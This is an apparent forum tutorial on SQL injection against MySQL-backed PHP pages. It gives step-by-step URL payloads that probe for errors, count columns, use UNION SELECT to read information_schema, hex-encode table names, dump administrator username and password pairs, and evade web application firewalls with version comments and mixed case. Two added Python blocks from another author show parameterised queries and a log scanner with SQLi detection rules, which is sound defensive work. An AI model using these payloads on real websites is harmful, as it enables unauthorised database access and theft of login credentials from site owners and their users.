Basic SQL injection.
+ string injection (forcing an error)
For educational purposes only.
What do we need?
1. This tutorial.
2. Notepad. Because using a pen and paper would take too long.
3. A vulnerable site.
Let's start.
1. Check if the site is vulnerable.
Put a ' directly after the id value in the link.
Code:
http://www.[site].com/page.php?id=1
Code:
http://www.[site].com/page.php?id=1'
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''5''' at line 1
2. Order by (count the columns).
Code:
http://www.[site].com/page.php?id=1+order+by+1--+- [no error]
http://www.[site].com/page.php?id=1+order+by+99--+- [!!error!!]
http://www.[site].com/page.php?id=1+order+by+2--+- [no error]
http://www.[site].com/page.php?id=1+order+by+3--+- [no error]
http://www.[site].com/page.php?id=1+order+by+4--+- [error]
To check whether we need a string injection:
if you do not get an error when you use order+by+99--+-,
then we will need to force an error.
Code:
http://www.[site].com/page.php?id=1+order+by+1--+- [no error]
http://www.[site].com/page.php?id=1+order+by+99--+- [no error]
http://www.[site].com/page.php?id=1+order+by+2--+- [no error]
http://www.[site].com/page.php?id=1+order+by+3--+- [no error]
http://www.[site].com/page.php?id=1+order+by+4--+- [no error]
Always place a ' directly after the id number.
Code:
http://www.[site].com/page.php?id=1'+order+by+1--+- [no error]
http://www.[site].com/page.php?id=1'+order+by+99--+- [!!error!!]
http://www.[site].com/page.php?id=1'+order+by+2--+- [no error]
http://www.[site].com/page.php?id=1'+order+by+3--+- [no error]
http://www.[site].com/page.php?id=1'+order+by+4--+- [error]
We know we have 3 columns now.
[attention] If you had to force an error, never forget to use the ' after the id number. [attention]
3. Union Select.
Code:
http://www.[site].com/page.php?id=1+union+select+1,2,3--+-
Let's say I see a big 2 in the middle of my site.
That means column 2 is reflected on the page, so that is the column we can use.
We will check the version now.
Code:
http://www.[site].com/page.php?id=1+union+select+1,version(),3--+-
Code:
http://www.[site].com/page.php?id=1+union+select+1,@@version,3--+-
We always want it to be 5.x.x or higher, because the information_schema tables used below only exist from MySQL 5.0 on.
If it is lower than 5, give up.
Let's say mine is: 5.0.92 - community
That means I'm ready to roll.
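As an added defensive example (mine, not part of the original tutorial): a small Python/sqlite3 stand-in for the page.php?id= backend with exactly three columns, showing the three probes from above (the stray quote, order by past the column count, union select) against a string-built query and against a parameterised one. The table, its columns and the row are constructed for the demo.

```python
import sqlite3
from urllib.parse import parse_qs

# Constructed stand-in for the page.php?id= backend (assumption): one table
# with exactly three columns, so "order by 4" fails just like in the tutorial.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE page (id INTEGER, title TEXT, body TEXT)")
    con.execute("INSERT INTO page VALUES (1, 'Home', 'Welcome')")
    return con

def id_from_query(query_string):
    """Decode the id= value the way the web server does ('+' becomes a space)."""
    return parse_qs(query_string)["id"][0]

def vulnerable_lookup(con, id_value):
    """The injectable pattern: the parameter is pasted into the SQL text,
    so a quote, an ORDER BY or a UNION in it becomes part of the query."""
    sql = "SELECT id, title, body FROM page WHERE id=" + id_value
    try:
        return {"rows": con.execute(sql).fetchall(), "error": None}
    except sqlite3.Error as exc:
        return {"rows": [], "error": str(exc)}

def safe_lookup(con, id_value):
    """Hardened version: the value is bound as a parameter, so the whole
    payload is compared against id as data and is never parsed as SQL."""
    sql = "SELECT id, title, body FROM page WHERE id=?"
    return {"rows": con.execute(sql, (id_value,)).fetchall(), "error": None}

def demo(query_string, safe=False):
    """Run one query string in the tutorial's URL form through either lookup."""
    con = make_db()
    lookup = safe_lookup if safe else vulnerable_lookup
    return lookup(con, id_from_query(query_string))

if __name__ == "__main__":
    for q in ("id=1'", "id=1+order+by+4--+-", "id=1+union+select+1,2,3--+-"):
        print(q, "| concatenated:", demo(q), "| bound:", demo(q, safe=True))
```

With the bound parameter every probe simply returns no rows and no error, which is why the tutorial's error-based column counting gives the attacker nothing to work with.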
4. Select database name:
Code:
http://www.[site].com/page.php?id=1+union+select+1,group_concat(database()),3--+-
Code:
http://www.[site].com/page.php?id=1+union+select+1,database(),3--+-
Or do this:
Code:
http://www.[site].com/page.php?id=1+union+select+1,group_concat(schema_name),3+from+information_schema.schemata--+-
This line asks the server for its database name(s), read from information_schema.schemata.
group_concat() is the function we use to pull many values back in one row, so we can select anything we need.
5. Select table names:
Code:
http://www.[site].com/page.php?id=1+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=database()--+-
If you want to find all the tables, you could also do this manually, one table per request, using concat() and a limit.
Code:
http://www.[site].com/page.php?id=1+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=database()+limit+0,1--+-
Now you should have a list with a lot of names in it.
We select what we need.
Let's check for:
user(s), admin(s)
administrator(s), member(s)
tbladmin(s), tblmember(s)
tbluser(s), tbladministrator(s)
tbl_admins, ..
Let's say I have an administrator table.
6. Select column names:
Code:
http://www.[site].com/page.php?id=1+union+select+1,group_concat(column_name),3+from+information_schema.columns+where+table_name="administrator"--+-
If you do not see all columns, or if you get an error: "DO NOT BE SCARED", it is not lost.
The fix is hex encoding (a 0x hex literal needs no quote characters): http://www.swingnote.com/tools/texttohex.php
Place the table name (in my case: administrator) where it says:
Say hello to my little friend!
Translate: 61646d696e6973747261746f72 (administrator)
This is my hex.
How to add it to the link: where you now have table_name="administrator"--+-
at the end of your link, change it to table_name=0x--+-
and place the hex directly after the 0x.
Code:
http://www.[site].com/page.php?id=1+union+select+1,group_concat(column_name),3+from+information_schema.columns+where+table_name=0x61646d696e6973747261746f72--+-
Now you should see a lot of names again. Look for username and password, or email/password, or name/pass, whatever relates.
Mine are user and pass.
How do we select these? Not that hard at all.
We use group_concat(user,0x3a,pass); the 0x3a is necessary, it is the hex for a colon (:) and separates the two values.
At the end: +from+db_1.administrator
db_1 is the database name we found at the start.
And you do not need hex now, because db_1.administrator is an identifier, not a quoted string!
As follows:
Code:
http://www.[site].com/page.php?id=1+union+select+1,group_concat(user,0x3a,pass),3+from+db_1.administrator--+-
7. WAF bypassing. (basics)
When you get an error using the union select statement,
it is most likely because the admins made an attempt to secure against SQLi.
Those admins fail...
So we have to make sure we can actually use the union statement
to get what we need. A basic example: /*!union*/+/*!select*/
The /*! */ (a MySQL version comment, whose contents the server still executes) gets past the WAF because the filter only blocks the literal union+select.
Code:
http://www.[site].com/page.php?id=1+/*!union*/+/*!select*/+1,2,3--+-
There are many ways to bypass a WAF.
Example: un>ion+sel>ect
or: UnIoN+SeLeCt
Now that we have bypassed it, we still need information from the columns.
Code:
http://www.[site].com/page.php?id=1+/*!union*/+/*!select*/+1,CoNcAt(version()),3--+-
Same for database.
Now we need tables.
Code:
http://www.[site].com/page.php?id=1+/*!union*/+/*!select*/+1,GrOuP_CoNcAt(/*!table_name*/),3+FrOm+/*!information_schema*/.TaBlEs+WhErE+/*!table_schema*/=database()--+-
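An added detection example (mine, not from the tutorial): every trick in this section comes undone once the request is URL-decoded, the /*!...*/ wrappers are unwrapped and the text is lower-cased, which is exactly what a filter that only looks for the literal union+select fails to do. The scanner below applies that normalisation to constructed access-log lines shaped like the tutorial's URLs; the log lines, IP addresses and rule names are made up for the demo.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not from the page) shaped like the tutorial's requests.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /page.php?id=1 HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /page.php?id=1' HTTP/1.1" 500 231
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /page.php?id=1+order+by+99--+- HTTP/1.1" 500 231
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /page.php?id=1+union+select+1,2,3--+- HTTP/1.1" 200 540
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /page.php?id=1+/*!union*/+/*!select*/+1,GrOuP_CoNcAt(/*!table_name*/),3+FrOm+/*!information_schema*/.TaBlEs--+- HTTP/1.1" 200 900
10.0.0.7 - - [01/Jan/2024:10:00:06 +0000] "GET /page.php?id=1+UnIoN+SeLeCt+1,2,3+from+information_schema.columns+where+table_name=0x61646d696e6973747261746f72--+- HTTP/1.1" 200 700
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /search.php?q=union+station HTTP/1.1" 200 300
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def normalize(raw_query):
    """Undo the obfuscations the tutorial relies on: URL encoding, MySQL
    /*!...*/ version comments (kept, since the server executes their
    contents), plain comments, odd spacing and mixed case."""
    s = unquote_plus(raw_query)
    s = re.sub(r"/\*!\d*\s*(.*?)\*/", r" \1 ", s)
    s = re.sub(r"/\*.*?\*/", " ", s)
    return re.sub(r"\s+", " ", s).strip().lower()

# Each rule matches one request shape the tutorial walks through.
RULES = [
    ("quote-probe", re.compile(r"=\d+'(?:\s|$)")),
    ("order-by-probe", re.compile(r"\border by \d+")),
    ("union-select", re.compile(r"\bunion\b.*\bselect\b")),
    ("information_schema", re.compile(r"\binformation_schema\b")),
    ("hex-literal", re.compile(r"\b0x[0-9a-f]{2,}")),
    ("comment-terminator", re.compile(r"--(?:\s|-|$)")),
]

def scan_log(text):
    """Return [(line_number, [rule names])] for every request that matches."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m or "?" not in m.group(1):
            continue
        query = normalize(m.group(1).split("?", 1)[1])
        names = [name for name, rx in RULES if rx.search(query)]
        if names:
            hits.append((n, names))
    return hits

if __name__ == "__main__":
    for n, names in scan_log(SAMPLE_LOG):
        print(f"line {n}: {', '.join(names)}")
```

The benign "union station" search on the last line is not flagged because the union rule also requires a select keyword after normalisation.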
I will not be teaching you how to decrypt those passwords.
Do not copy & paste. Type everything you see in the URL.
You will learn a lot faster! And your mind will be 100% focused on the SQLi.